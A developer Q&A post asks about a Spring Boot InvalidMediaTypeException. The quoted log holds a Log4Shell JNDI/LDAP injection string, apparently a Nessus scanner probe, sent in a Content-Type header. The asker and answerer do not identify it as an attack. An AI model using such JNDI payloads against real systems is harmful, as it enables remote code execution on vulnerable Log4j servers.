# Getting error in springboot org.springframework.http.InvalidMediaTypeException

Tags: java, spring-boot

> Servlet.service() for servlet [dispatcherServlet] in context with path
> [] threw exception [Request processing failed; nested exception is
> org.springframework.http.InvalidMediaTypeException: Invalid mime type
> "${jndi:ldap://log4shell-generic-RCVPIyfJ0FCvx1PVijWU${lower:ten}.w.nessus.org/nessus}":
> Invalid token character '{' in token "${jndi:ldap:"] with root
> cause|app-exception=Invalid mime type
> "${jndi:ldap://log4shell-generic-RCVPIyfJ0FCvx1PVijWU${lower:ten}.w.nessus.org/nessus}":
> Invalid token character '{' in token
> "${jndi:ldap:"|app-stacktrace=[Ljava.lang.StackTraceElement;@68272cd6
> org.springframework.util.InvalidMimeTypeException: Invalid mime type
> "${jndi:ldap://log4shell-generic-RCVPIyfJ0FCvx1PVijWU${lower:ten}.w.nessus.org/nessus}":
> Invalid token character '{' in token "${jndi:ldap:"   at
> org.springframework.util.MimeTypeUtils.parseMimeTypeInternal(MimeTypeUtils.java:273)
> ~[spring-core-5.3.19.jar!/:5.3.19]

Comment: Hi, Ric did you get the solution of this issue?

Answer (score 0):

It is possible that the `Content-Type` header you are passing in the request is incorrect. You might be passing some invalid characters in it.
You can check the spring supported MimeTypes here.
https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/util/MimeTypeUtils.html